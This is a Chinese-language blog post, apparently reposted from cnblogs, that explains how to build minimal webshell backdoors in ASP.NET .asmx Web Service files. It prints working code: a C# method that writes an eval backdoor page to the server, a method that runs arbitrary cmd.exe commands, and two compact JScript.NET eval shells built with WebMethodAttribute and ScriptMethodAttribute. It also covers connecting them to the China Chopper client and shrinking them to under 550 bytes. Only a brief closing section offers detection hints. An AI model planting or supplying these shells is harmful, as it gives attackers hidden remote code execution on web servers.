探索基於.NET下實現一句話木馬之asmx篇

来源:https://www.cnblogs.com/Ivan1ee/archive/2019/01/16/10278625.html
-Advertisement-
Play Games

0x01 前言 上篇介紹了一般處理程式(ashx)的工作原理以及實現一句話木馬的過程,今天接著介紹Web Service程式 (asmx)下的工作原理和如何實現一句話木馬,當然介紹之前筆者找到了一款asmx馬兒 https://github.com/tennc/webshell/blob/maste ...


0x01 前言

上篇介紹了一般處理程式(ashx)的工作原理以及實現一句話木馬的過程,今天接著介紹Web Service程式 (asmx)下的工作原理和如何實現一句話木馬,當然介紹之前筆者找到了一款asmx馬兒 https://github.com/tennc/webshell/blob/master/caidao-shell/customize.asmx ,依舊是一個大馬如下圖

 

這個還只是對客戶端的菜刀做了適配可用,暫時不符合一句話木馬的特點哈,至於要打造一款居家旅行必備的菜刀馬,還得從原理上搞清楚 asmx的運行過程。

0x02 簡介和原理

Web Service是一個基於可編程的web的應用程式,用於開發分散式的互操作的應用程式,也是一種web服務,Web Service的主要目標是跨平臺的可互操作性,為了實現這一目標Web Service 完全基於XML(可擴展標記語言)、XSD(XML Schema)等獨立於平臺、獨立於軟體供應商的標準,是創建可互操作的、分散式應用程式的新平臺。簡單的來說Web Service具備三個要素SOAP(Simple Object Access Protocol)、WSDL(WebServicesDescriptionLanguage)、UDDI(UniversalDescriptionDiscovery andIntegration)之一, SOAP用來描述傳遞信息的格式, WSDL 用來描述如何訪問具體的介面, UDDI用來管理,分發查詢webService ,也因此使用Web Service有許多優點,例如可以跨平臺工作、部署升級維護起來簡單方便、實現多數據多個服務的聚合使用等等。再結合下圖說明一下WebService工作的流程

無論使用什麼工具、語言編寫 WebService,都可以使用 SOAP 協議通過 HTTP 調用,創建 WebService 後,任何語言、平臺的客戶都可以閱讀 WSDL 文檔來調用 WebService ,同時客戶端也可以根據 WSDL 描述文檔生成一個 SOAP 請求信息併發送到Web伺服器,Web伺服器再將請求轉發給 WebService 請求處理器。

對於.Net而言,WebService請求處理器則是一個 .NET Framework 自帶的 ISAPI Extension。Web請求處理器用於解析收到的SOAP請求,調用 WebService,然後生成相應的SOAP應答。Web伺服器得到SOAP應答後,在通過HTTP應答的方式將其返回給客戶端,但WebService也支持HTTP POST請求,僅需要在服務端增加一項配置即可。

 

0x03 一句話的實現

3.1、WebMethod

在Web Service程式中,如果一個公共方法想被外界訪問調用的話,就需要加上WebMethod,加上[WebMethod]屬性的公有方法就可以被訪問,而沒有加這個屬性的方法就是不能被訪問的。將 WebMethod 屬性 (Attribute) 附加到 Public 方法表示希望將該方法公開為 XML Web services 的一部分,它具備6個屬性:Description 、EnableSession、MessageName、TransactionOption、CacheDuration、BufferResponse,為了更清晰的表述WebService請看下麵這段代碼

這裡聲明成一個字元串類型的公共方法HelloWorld,如果此時在方法體內實現創建aspx文件,保存內容為一句話小馬的話那麼這個WebService就變成了服務後門,依照這個推理就產生了C#版本的WebService小馬,實現了兩個功能,一個是創建文件,還有一個是執行CMD命令,核心代碼如下:

[System.ComponentModel.ToolboxItem(false)]
        [WebMethod]
        /**
        Create A BackDoor
        **/
        public string webShell()
        {
            StreamWriter wickedly = File.CreateText(HttpContext.Current.Server.MapPath("Ivan.aspx"));
            wickedly.Write("<%@ Page Language=\"Jscript\"%><%eval(Request.Item[\"Ivan\"],\"unsafe\");%>");
            wickedly.Flush();
            wickedly.Close();
            return "Wickedly";
        }
        [WebMethod]
        /**
        Exec Command via cmdShell 
       **/
        public string cmdShell(string input)
        {
            Process pr = new Process();
            pr.StartInfo.FileName = "cmd.exe";
            pr.StartInfo.RedirectStandardOutput = true;
            pr.StartInfo.UseShellExecute = false;
            pr.StartInfo.Arguments = "/c " + input;
            pr.StartInfo.WindowStyle = ProcessWindowStyle.Hidden;
            pr.Start();
            StreamReader osr = pr.StandardOutput;
            String ocmd = osr.ReadToEnd();
            osr.Close();
            osr.Dispose();
            return ocmd;
        }

知道原理後就開始著手打造菜刀可用的一句話木馬,和一般處理程式類似通過Jscript.Net的eval方法去實現代碼執行,根據之前的介紹WebMethod有多個屬性並且根據微軟的官方文檔 https://docs.microsoft.com/zh-cn/previous-versions/dotnet/netframework-1.1/1tyazy68%28v%3dvs.80%29 可以得出Jscript.Net中可以使用 WebMethodAttribute 來替代[WebMethod]。

一句話實現的代碼如下:

<%@ WebService Language="JScript" class="asmxWebMethodSpy"%>
import System;
import System.Web;
import System.IO;
import System.Web.Services;
public class asmxWebMethodSpy extends WebService
{       
    WebMethodAttribute function Invoke(Ivan: String) : Void
    { 
	       var I = HttpContext.Current;
        var Request = I.Request;
        var Response = I.Response;
        var Server = I.Server;
	        Response.Write("<H1>Just for Research Learning, Do Not Abuse It! Written By <a href='https://github.com/Ivan1ee'>Ivan1ee</a></H1>");
        eval(Ivan); 
    } 
}

打開瀏覽器,測試效果如下

依照SOAP1.1的規範要求,發送請求的數據包就可以實現一句話代碼執行,筆者這裡還是拿當前的時間作為攻擊載荷,如下圖

3.2、ScriptMethod

在研究WebMethod的時候,發現VisualStudio有段註釋如下圖

當客戶端請求的方式是AJAX的時候會導入System.Web.Script.Services.ScriptService命名空間,筆者嘗試去挖掘一下可能存在的新的攻擊點

代碼里ResponseFormat表示方法要返回的類型,一般為Json或者XML; UseHttpGet等於true表示前臺的ajax是通過GET可以訪問此方法,如果前臺ajax通過POST,則報錯。

根據C#中的代碼可知需要配置WebMethod和ScriptMethod才能正常玩轉,而在Jscript.Net中實現這兩個功能的分類是WebMethodAttribute類和ScriptMethodAttribute類,最終寫出一句話木馬服務端代碼:

<%@ WebService Language="JScript" class="ScriptMethodSpy"%>
import System;
import System.Web;
import System.IO;
import System.Web.Services
import System.Web.Script.Services
public class ScriptMethodSpy extends WebService
{       
	WebMethodAttribute ScriptMethodAttribute function Invoke(Ivan : String) : Void
    { 
	        var I = HttpContext.Current;
        var Request = I.Request;
        var Response = I.Response;
        var Server = I.Server;
	Response.Write("<H1>Just for Research Learning, Do Not Abuse It! Written By <a href='https://github.com/Ivan1ee'>Ivan1ee</a></H1>");
        eval(Ivan); 
    } 
}

打開瀏覽器輸入 Response.Write(DateTime.Now) 成功列印出當前時間

可惜的是這種方法不支持.NET  2.0究其原因是using System.Web.Script.Services;這個命名空間並不在System.Web中,而是在ajax擴展中需要額外安裝ASP.NET 2.0 AJAX Extensions,所以在2.0的環境下儘量避免使用該方法。

0X04 菜刀連接

菜刀不支持SOAP的方式提交payload,直接連接asmx文件就會出現下圖錯誤

第一種解決方法可以自己寫代碼實現支持SOAP的客戶端,第二種辦法參考asmx頁面最下方給出的HTTP POST提交方式

本地環境下用菜刀連接沒問題,可以正常連接

但通常部署到伺服器上可能會遇到下麵的提示

多數情況下程式開發者會支持HTTP POST請求,所以對此不必過於擔心。還有就是基於優化考慮將asmxWebMethodSpy.asmx進一步壓縮體積後只有499個位元組,asmxScriptMethodSpy.asmx也只有547個位元組。

 

 

0x05 防禦措施

通過菜刀連接的方式,添加可以檢測菜刀關鍵特征的規則;對於Web應用來說,儘量保證代碼的安全性;對於IDS規則層面來說,上傳的時候可以加入WebMethodAttribute等關鍵詞的檢測

 

0x06 小結

 還有本文提供了兩種方式實現asmx一句話的思路,當然還有更多編寫一句話的技巧有待發掘,下次將介紹另外一種姿勢,敬請期待;文章的代碼片段請參考 https://github.com/Ivan1ee

 

0x07 參考鏈接

 https://docs.microsoft.com/zh-cn/previous-versions/dotnet/netframework-1.1/1tyazy68%28v%3dvs.80%29

https://github.com/tennc/webshell/blob/master/caidao-shell/customize.asmx

https://www.cnblogs.com/bpdwn/p/3479421.html

https://github.com/Ivan1ee

 

 

 

 


您的分享是我們最大的動力!

-Advertisement-
Play Games
更多相關文章
  • 做 web 項目,測試是無法避免的。對於某些特定功能,採用單元測試就行。但如果想對網站進行整體測試,人工點擊測試可行但有點累,如果能藉助自動化測試工具就更好了。selenium 就是一款能滿足這樣要求的測試工具,selenium 是一款用於 web 應用程式測試的工具。測試是直接運行在瀏覽器中,就像 ...
  • ## Golang多核判斷素數方式 缺陷: 1. 判斷素數的方法很low,有更好的數學方法降維打擊 2. 結束程式的方式很差,有可能(幾乎必然)漏掉末尾幾個素數無法錄入 ...
  • 問題:cookies基於瀏覽器的同源策略,不同功能變數名稱的cookie不能相互訪問,為什麼可以進行跨站請求偽造呢? 原因:cookie基於瀏覽器的同源策略,確實是在實現狀態保持的時候,不能跨域訪問。 跨站請求的偽造過程:是其他網站偽造訪問原網站的請求,導致的一系列信息泄露。 具體偽造過程: 如何防止CSR ...
  • MATLAB常微分方程數值解 作者:凱魯嘎吉 - 博客園 http://www.cnblogs.com/kailugaji/ 1.一階常微分方程初值問題 2.歐拉法 3.改進的歐拉法 4.四階龍格庫塔方法 5.例題 用歐拉法,改進的歐拉法及4階經典Runge-Kutta方法在不同步長下計算初值問題。 ...
  • python的進程和線程經常用到,之前一直不明白threading的join和setDaemon的區別和用法,今天特地研究了一下。multiprocessing中也有這兩個方法,同樣適用,這裡以threading的join和setDaemon舉例。 1、join ()方法:主線程A中,創建了子線程B ...
  • 1. 前言 上一篇文章( "[UWP]如何使用代碼創建DataTemplate(或者ControlTemplate)" )介紹了在UWP上的情況,這篇文章再稍微介紹在WPF上如何實現。 2. 使用FrameworkElementFactory "FrameworkElementFactory" 用於 ...
  • 在我們日常工作中,總會遇到一個查詢功能需要對首次查詢結果進行二次甚至是多次處理才能得到最終需要的數據的情況。先不談如何避免這種情況,這裡只說一下出現這種情況的處理辦法。 假設存在以下場景:存在訂單表OrderInfo和訂單擴展表OrderInfoExtend,因為某種特殊原因,不能夠在一次SQL查詢 ...
  • 因最近工作需要一個動態的許可權配置功能,具體實現邏輯是c#的動態代理功能,廢話不多說,直接乾貨。需求: 從本篇開始我們使用動態代理完成一個案例,包含動態許可權控制的核心功能。 c# 如何實現動態代理 c#實現動態代理可以使用.net framework 中提供的RealProxy類。 可以看到RealP ...
一周排行
    -Advertisement-
    Play Games
  • 移動開發(一):使用.NET MAUI開發第一個安卓APP 對於工作多年的C#程式員來說,近來想嘗試開發一款安卓APP,考慮了很久最終選擇使用.NET MAUI這個微軟官方的框架來嘗試體驗開發安卓APP,畢竟是使用Visual Studio開發工具,使用起來也比較的順手,結合微軟官方的教程進行了安卓 ...
  • 前言 QuestPDF 是一個開源 .NET 庫,用於生成 PDF 文檔。使用了C# Fluent API方式可簡化開發、減少錯誤並提高工作效率。利用它可以輕鬆生成 PDF 報告、發票、導出文件等。 項目介紹 QuestPDF 是一個革命性的開源 .NET 庫,它徹底改變了我們生成 PDF 文檔的方 ...
  • 項目地址 項目後端地址: https://github.com/ZyPLJ/ZYTteeHole 項目前端頁面地址: ZyPLJ/TreeHoleVue (github.com) https://github.com/ZyPLJ/TreeHoleVue 目前項目測試訪問地址: http://tree ...
  • 話不多說,直接開乾 一.下載 1.官方鏈接下載: https://www.microsoft.com/zh-cn/sql-server/sql-server-downloads 2.在下載目錄中找到下麵這個小的安裝包 SQL2022-SSEI-Dev.exe,運行開始下載SQL server; 二. ...
  • 前言 隨著物聯網(IoT)技術的迅猛發展,MQTT(消息隊列遙測傳輸)協議憑藉其輕量級和高效性,已成為眾多物聯網應用的首選通信標準。 MQTTnet 作為一個高性能的 .NET 開源庫,為 .NET 平臺上的 MQTT 客戶端與伺服器開發提供了強大的支持。 本文將全面介紹 MQTTnet 的核心功能 ...
  • Serilog支持多種接收器用於日誌存儲,增強器用於添加屬性,LogContext管理動態屬性,支持多種輸出格式包括純文本、JSON及ExpressionTemplate。還提供了自定義格式化選項,適用於不同需求。 ...
  • 目錄簡介獲取 HTML 文檔解析 HTML 文檔測試參考文章 簡介 動態內容網站使用 JavaScript 腳本動態檢索和渲染數據,爬取信息時需要模擬瀏覽器行為,否則獲取到的源碼基本是空的。 本文使用的爬取步驟如下: 使用 Selenium 獲取渲染後的 HTML 文檔 使用 HtmlAgility ...
  • 1.前言 什麼是熱更新 游戲或者軟體更新時,無需重新下載客戶端進行安裝,而是在應用程式啟動的情況下,在內部進行資源或者代碼更新 Unity目前常用熱更新解決方案 HybridCLR,Xlua,ILRuntime等 Unity目前常用資源管理解決方案 AssetBundles,Addressable, ...
  • 本文章主要是在C# ASP.NET Core Web API框架實現向手機發送驗證碼簡訊功能。這裡我選擇是一個互億無線簡訊驗證碼平臺,其實像阿裡雲,騰訊雲上面也可以。 首先我們先去 互億無線 https://www.ihuyi.com/api/sms.html 去註冊一個賬號 註冊完成賬號後,它會送 ...
  • 通過以下方式可以高效,並保證數據同步的可靠性 1.API設計 使用RESTful設計,確保API端點明確,並使用適當的HTTP方法(如POST用於創建,PUT用於更新)。 設計清晰的請求和響應模型,以確保客戶端能夠理解預期格式。 2.數據驗證 在伺服器端進行嚴格的數據驗證,確保接收到的數據符合預期格 ...